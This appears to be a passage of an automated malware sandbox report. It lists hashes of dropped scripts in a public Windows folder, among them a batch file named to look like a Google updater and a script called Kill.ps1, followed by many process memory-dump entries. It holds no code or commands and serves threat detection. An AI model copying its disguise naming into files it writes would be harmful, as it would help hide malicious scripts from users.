d50605593740da71810d0dedf04281e0

SHA1
b672961b731400d653039fedcd7dfa71cc3e0179

SHA256
56ec901d7efadda7a2868abc7ff458d8177660361e5572a4806a232e46846464

SHA512
190a98490786fbdf8b189ea10697b7a6acebdaf0dcda11d7d6fde8c1df72af2fd4c5d0b2874d812e20307d609d25af354ff74ce2fd564a563b84912975f46b05

Download Submit
C:\Users\Public\GoogleUpdate.bat
MD5
311524c0e72f5c65f62bf73ffb57ee3c

SHA1
c917cb67fac476be24cd73eddafd21c7da79af15

SHA256
62da5d7a78b42aeed845e30f7360e42adb2cf77365386295ebc549d9ce0d4daa

SHA512
2d46fdb99392f85a47e1bf465f8948d1af139fda4176b3f058ad9f079a781a2167a2e7480883517cb01cb2bb675bd7dcb5f285cd957439c9119c5407fd209411

Download Submit
C:\Users\Public\Kill.ps1
MD5
2e1021023713f80d3d233d4a9467e6b2

SHA1
94ae0dd1fccbed177d354e39e99737293900b28a

SHA256
d532e0ef22db774861c441769b16edfc9df1e055423fcda74230d774ce09370a

SHA512
e9599bb5fc8766cf259dab6eaf7802f3be9a0a7da347cf93e8616d4239ef37a7d7eecb9f48d46498f4f6522cb2aa6bd2897bd8a7476c86913dc8247ddf8ace7f

Download Submit
C:\Users\Public\msi.ps1
MD5
97f0f938539a25246c828d87c5e48f62

SHA1
4f10bb992fd64f0a557042a1106668c85fdd5f3b

SHA256
0999d08d479601a03a4a5bc0c38008a29154fc8cd79cbdc0a38ff0a50af2169a

SHA512
e60a11ae767955a75d134e681d77b194dfa0250836661e2bb38f5cfcfe533b76639f86ec20a788d2fbf1427ec9980b2d3258fd51d0dfda2dee705500bc1a760b

Download Submit
C:\Users\Public\ss.vbs
MD5
08bf79a5127245618544f027c546a005

SHA1
6ac50798a76df4df9bd722b6470ac793b5aab246

SHA256
3dc438c70100537bacbeb587d11bab258e884645f8a8998e839c982c682907f7

SHA512
dcacb5916686c6e52c9275555cfec94556b83acae72e4eb11fea22433fcffebf76e2dc5c7e79094df619b97509f7384c963e4dbb60ce1c16abc56ce4f49eabf9

Download Submit
memory/904-257-0x000000000040D0CE-mapping.dmp

Download
memory/904-261-0x00000000052B0000-0x00000000052B1000-memory.dmp

Filesize
4KB

Download
memory/1004-114-0x0000000000000000-mapping.dmp

Download
memory/1004-132-0x00000217E1646000-0x00000217E1648000-memory.dmp

Filesize
8KB

Download
memory/1004-128-0x00000217E1643000-0x00000217E1645000-memory.dmp

Filesize
8KB

Download
memory/1004-126-0x00000217E1640000-0x00000217E1642000-memory.dmp

Filesize
8KB

Download
memory/1004-125-0x00000217E1650000-0x00000217E1651000-memory.dmp

Filesize
4KB

Download
memory/1004-120-0x00000217E1500000-0x00000217E1501000-memory.dmp

Filesize
4KB

Download
memory/1124-218-0x0000026E2DA66000-0x0000026E2DA68000-memory.dmp

Filesize
8KB

Download
memory/1124-212-0x0000026E2DA63000-0x0000026E2DA65000-memory.dmp

Filesize
8KB

Download
memory/1124-211-0x0000026E2DA60000-0x0000026E2DA62000-memory.dmp

Filesize
8KB

Download
memory/1124-207-0x0000000000000000-mapping.dmp

Download
memory/1672-240-0x0000021FD2CD3000-0x0000021FD2CD5000-memory.dmp

Filesize
8KB

Download
memory/1672-236-0x0000000000000000-mapping.dmp

Download
memory/1672-239-0x0000021FD2CD0000-0x0000021FD2CD2000-memory.dmp

Filesize
8KB

Download
memory/1672-241-0x0000021FD2CD6000-0x0000021FD2CD8000-memory.dmp

Filesize
8KB

Download
memory/1820-141-0x0000000000000000-mapping.dmp

Download
memory/2076-260-0x0000000000000000-mapping.dmp

Download
memory/2260-229-0x00000238E9590000-0x00000238E9592000-memory.dmp

Filesize
8KB

Download
memory/2260-227-0x0000000000000000-mapping.dmp

Download
memory/2260-230-0x00000238E9593000-0x00000238E9595000-memory.dmp

Filesize
8KB

Download
memory/2260-233-0x00000238E9596000-0x00000238E9598000-memory.dmp

Filesize
8KB

Download
memory/2292-219-0x0000025BB1CA6000-0x0000025BB1CA8000-memory.dmp

Filesize
8KB

Download
memory/2292-143-0x0000000000000000-mapping.dmp

Download
memory/2292-163-0x0000025BB1CA0000-0x0000025BB1CA2000-memory.dmp

Filesize
8KB

Download
memory/2292-164-0x0000025BB1CA3000-0x0000025BB1CA5000-memory.dmp

Filesize
8KB

Download
memory/2808-245-0x0000000000000000-mapping.dmp

Download
memory/2872-217-0x0000000000000000-mapping.dmp

Download
memory/2928-205-0x000001C41A630000-0x000001C41A632000-memory.dmp

Filesize
8KB

Download
memory/2928-210-0x000001C41A636000-0x000001C41A638000-memory.dmp

Filesize
8KB

Download
memory/2928-206-0x000001C41A633000-0x000001C41A635000-memory.dmp

Filesize
8KB

Download
memory/2928-202-0x0000000000000000-mapping.dmp

Download
memory/3204-220-0x0000000000000000-mapping.dmp

Download
memory/3204-224-0x0000023C984B3000-0x0000023C984B5000-memory.dmp

Filesize
8KB

Download
memory/3204-226-0x0000023C984B8000-0x0000023C984B9000-memory.dmp

Filesize
4KB

Download
memory/3204-223-0x0000023C984B0000-0x0000023C984B2000-memory.dmp

Filesize
8KB

Download
memory/3204-225-0x0000023C984B6000-0x0000023C984B8000-memory.dmp

Filesize
8KB

Download
memory/3292-259-0x0000000000F40000-0x0000000000F41000-memory.dmp

Filesize
4KB

Download
memory/3292-258-0x000000000040D0CE-mapping.dmp

Download
memory/3496-244-0x0000000000000000-mapping.dmp

Download
memory/3696-253-0x0000000000000000-mapping.dmp

Download
memory/3696-256-0x00000246D9CD3000-0x00000246D9CD5000-memory.dmp

Filesize
8KB

Download
memory/3696-254-0x00000246D9CD0000-0x00000246D9CD2000-memory.dmp

Filesize
8KB

Download
memory/3884-168-0x000002258A773000-0x000002258A775000-memory.dmp

Filesize
8KB

Download
memory/3884-155-0x0000000000000000-mapping.dmp

Download
memory/3884-166-0x000002258A770000-0x000002258A772000-memory.dmp

Filesize
8KB

Download
memory/3884-175-0x000002258A776000-0x000002258A778000-memory.dmp

Filesize
8KB

Download
memory/4476-249-0x000001CA26DD3000-0x000001CA26DD5000-memory.dmp

Filesize
8KB

Download
memory/4476-248-0x000001CA26DD0000-0x000001CA26DD2000-memory.dmp

Filesize
8KB

Download
memory/4476-246-0x0000000000000000-mapping.dmp

Download
memory/4516-199-0x0000026C00126000-0x0000026C00128000-memory.dmp

Filesize
8KB

Download
memory/4516-196-0x0000026C00123000-0x0000026C00125000-memory.dmp

Filesize
8KB

Download
memory/4516-195-0x0000026C00120000-0x0000026C00122000-memory.dmp

Filesize
8KB

Download
memory/4516-177-0x0000000000000000-mapping.dmp

Download
memory/4744-252-0x0000000000000000-mapping.dmp

Download
memory/4748-251-0x0000000000000000-mapping.dmp

Download
memory/4768-200-0x000001BCA2FB0000-0x000001BCA2FB2000-memory.dmp

Filesize
8KB

Download
memory/4768-201-0x000001BCA2FB3000-0x000001BCA2FB5000-memory.dmp

Filesize
8KB

Download
memory/4768-204-0x000001BCA2FB6000-0x000001BCA2FB8000-memory.dmp

Filesize
8KB

Download
memory/4768-197-0x0000000000000000-mapping.dmp

Download
memory/4828-234-0x000001D96A850000-0x000001D96A852000-memory.dmp

Filesize
8KB

Download
memory/4828-235-0x000001D96A853000-0x000001D96A855000-memory.dmp

Filesize
8KB

Download
memory/4828-238-0x000001D96A856000-0x000001D96A858000-memory.dmp

Filesize
8KB

Download
memory/4828-231-0x0000000000000000-mapping.dmp

Download
memory/5100-215-0x0000000000000000-mapping.dmp

Download